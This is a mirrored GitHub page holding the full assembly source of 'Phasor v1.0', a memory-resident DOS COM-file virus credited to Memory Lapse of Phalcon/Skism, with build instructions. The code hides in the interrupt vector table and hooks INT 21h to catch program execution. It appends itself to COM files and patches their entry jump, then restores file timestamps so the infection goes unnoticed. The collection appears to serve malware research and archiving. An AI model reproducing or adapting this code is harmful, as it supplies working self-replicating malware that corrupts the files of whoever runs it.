mirror of
https://github.com/vxunderground/MalwareSourceCode
synced 2024-06-28 09:52:32 +00:00
167 lines
10 KiB
NASM
167 lines
10 KiB
NASM
;
|
|
; [Phasor] v1.0
|
|
; Written by Memory Lapse of Phalcon/Skism
|
|
;
|
|
; This is a simple memory resident, COM infector. It hides in the unused
|
|
; portion of the interrupt table starting at 0:1E0h.
|
|
;
|
|
; To Assemble:
|
|
; TASM [PHASOR10]/m2 - TLINK [PHASOR10]/T
|
|
;
|
|
.model tiny ;
|
|
.code ;
|
|
.286 ;
|
|
org 100h ;
|
|
;
|
|
start: ;Mark Start of Code
|
|
v_start: ;Mark Start of Virus
|
|
mov bp,0000h ;Self Modifying Delta
|
|
delta equ $-002h ; Offset.
|
|
;
|
|
xor di,di ;Load Register w/Zero
|
|
mov es,di ;ES = 000h
|
|
;
|
|
mov di,01E0h ;DI = 1E0h
|
|
;
|
|
cmp byte ptr es:[di],0BDh ;Virus Present?
|
|
jz restoreCOMbytes ;(0BDh = MOV BP,XXXX)
|
|
;
|
|
push cs ;Save CS onto Stack
|
|
pop ds ;Restore DS (CS=DS)
|
|
;
|
|
mov cx,(heap_end-v_start)/002h ;CX = # of Words To Copy
|
|
lea si,[bp+100h] ;SI = Start of Virus
|
|
rep movsw ;Copy Virus To Int Table
|
|
;
|
|
mov ax,offset i021h+0E0h ;AX = Handler + Offset
|
|
;
|
|
xchg ax,word ptr es:[084h] ;Modify Interrupt Table
|
|
mov word ptr es:[i021hOffset+0E0h],ax ; To Point To Virus's
|
|
; Interrupt 021h
|
|
mov ax,es ; Handler.
|
|
;
|
|
xchg ax,word ptr es:[086h] ;
|
|
mov word ptr es:[i021hSegment+0E0h],ax ;
|
|
;
|
|
restoreCOMbytes: ;
|
|
push cs cs ;Equal Out Segment
|
|
pop ds es ; Registers.
|
|
;
|
|
lea si,[bp+host_bytes] ;SI = Host's Bytes
|
|
mov di,100h ;DI = Start of Host
|
|
push di ;Save DI onto Stack
|
|
mov byte ptr [di],0C3h ;Write RET to Host
|
|
call di ;Call 100h (RET)
|
|
;
|
|
movsb ;Byte @ DS:[SI]=>ES:[DI]
|
|
movsw ;Word @ DS:[SI]=>ES:[DI]
|
|
;
|
|
retn ;Return to Host Program.
|
|
;
|
|
host_bytes db 0CDh,020h,000h ;Buffer For Starting of
|
|
; Host Program.
|
|
infect: xor bp,bp ;Load Register w/Zero
|
|
;
|
|
mov ax,3D00h ;AX = 3D00h
|
|
int 021h ;Open File in R/O Mode.
|
|
;
|
|
xchg ax,bx ;
|
|
;
|
|
push bx cs cs ;Save Handle, Equal Out
|
|
pop ds es ; Segment Registers.
|
|
;
|
|
mov ax,1220h ;AX = 1220h
|
|
int 02Fh ;Get JFT.
|
|
;
|
|
mov ax,1216h ;AX = 1216h
|
|
mov bl,byte ptr es:[di] ;BL = Location of SFT
|
|
int 02Fh ;Get SFT.
|
|
;
|
|
pop bx ;Restore File Handle
|
|
;
|
|
mov word ptr es:[di+002h],002h ;Open File For Read And
|
|
; Write Mode.
|
|
mov ah,03Fh ;AH = 3Fh
|
|
mov cx,003h ;CX = # of Bytes To Read
|
|
mov dx,offset host_bytes+0E0h ;DX = Buffer + Offset
|
|
int 021h ;Read 003h Bytes To Bufr
|
|
;
|
|
mov si,dx ;SI = DX
|
|
;
|
|
cmp word ptr [si+000h],5A4Dh ;EXE File?
|
|
jz closeCOMfile ;Exit Virus
|
|
;
|
|
cmp word ptr [si+000h],4D5Ah ;EXE File?
|
|
jz closeCOMfile ;Exit Virus
|
|
;
|
|
push cx ;Save CX onto Stack.
|
|
;
|
|
mov ax,4202h ;AX = 4202h
|
|
xor cx,cx ;Load Register w/Zero
|
|
cwd ;Load Register w/Zero
|
|
int 021h ;Move File Pointer @ EOF
|
|
;
|
|
pop cx ;Restore CX.
|
|
;
|
|
mov word ptr [delta+0E0h],ax ;Write Delta Offset
|
|
;
|
|
sub ax,cx ;Subtract 3h from Size.
|
|
mov byte ptr [temp_buffer+0E0h+000h],0E9h ;Write Jump to Buffer
|
|
mov word ptr [temp_buffer+0E0h+001h],ax ;Write Location to Buffr
|
|
;
|
|
sub ax,(v_end-v_start) ;Subtract Virus Length
|
|
;
|
|
cmp word ptr [si+001h],ax ;Is File Infected?
|
|
jz closeCOMfile ;Jump if Infected.
|
|
;
|
|
mov ah,040h ;AH = 40h
|
|
mov cx,(v_end-v_start) ;CX = # of Bytes to Wrte
|
|
mov dx,01E0h ;DX = Data to Write
|
|
int 021h ;Write To File.
|
|
;
|
|
mov word ptr es:[di+015h],bp ;Move File Pointer To
|
|
mov word ptr es:[di+017h],bp ;Start of File.
|
|
;
|
|
mov ah,040h ;AH = 40h
|
|
mov cx,003h ;CX = # of Bytes to Wrte
|
|
mov dx,offset temp_buffer+0E0h ;DX = Data to Write
|
|
int 021h ;Write To File.
|
|
;
|
|
mov ax,5701h ;AX = 5701h
|
|
mov cx,word ptr es:[di+00Dh] ;CX = Time Stamp
|
|
mov dx,word ptr es:[di+00Fh] ;DX = Date Stamp
|
|
int 021h ;Set Time.
|
|
;
|
|
closeCOMfile: ;
|
|
mov ah,03Eh ;AH = 3Eh
|
|
int 021h ;Close File.
|
|
;
|
|
jmp exit ;Unconditional Jump
|
|
;
|
|
db "[ML/PS]" ;
|
|
;
|
|
i021h: pusha ;Preserve All Regs.
|
|
push ds es ;Save Segment Registers.
|
|
;
|
|
sub ax,4B00h ;Executing A File?
|
|
jnz exit ;Jump If Not 4B00h.
|
|
;
|
|
jmp infect ;Unconditional Jump.
|
|
|
|
exit: pop es ds ;Restore Segment Regs.
|
|
popa ;Restore All Registers.
|
|
;
|
|
int21h: db 0EAh ;JMP SSSS:OOOOO
|
|
;
|
|
v_end: ;End of Virus
|
|
heap_start: ;Start of Heap
|
|
;
|
|
i021hOffset dw 001h dup (?) ;Buffer for Offset
|
|
i021hSegment dw 001h dup (?) ;Buffer for Segment
|
|
|
|
temp_buffer db 003h dup (?) ;Buffer for Calculations
|
|
;
|
|
heap_end: ;End of Heap
|
|
;
|
|
end start ;End of Source
|